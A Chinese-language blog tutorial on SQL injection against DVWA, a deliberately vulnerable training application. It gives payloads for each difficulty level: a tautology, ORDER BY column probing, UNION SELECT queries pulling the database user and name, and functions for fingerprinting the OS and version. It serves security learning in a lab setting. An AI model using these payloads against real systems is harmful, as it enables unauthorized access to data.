【教程】DVWA系列之SQL注入

DVWA系列之SQL注入(SQL Injection)


LOW级别

1.输入1返回正常,输入1'返回异常。说明可能存在sql注入

2.遍历数据库所有内容

1'or'1'='1

3.查询数据库列数

1'order by 2 -- 
1'order by 3 -- 
//当值为2时返回正常,3返回异常


4.查询数据库用户及数据库名

1'and 1=2 union select user(),database() -- 
//有两个列,所以查两个


Medium级别

1.观察发现只能通过POST提交表单内的值,但还是可以抓包进行sql注入

2.直接查询数据库用户名及数据库名

1 and 1=2 union select user(),database()


HIGH级别

1.跟LOW级别一样,垃圾...

1 and 1=2 union select user(),database()

常见参数

user()         //数据库用户
database()  //数据库名
@@version_compile_os  //操作系统
Version()   //数据库版本号

本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】DVWA系列之SQL注入
分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)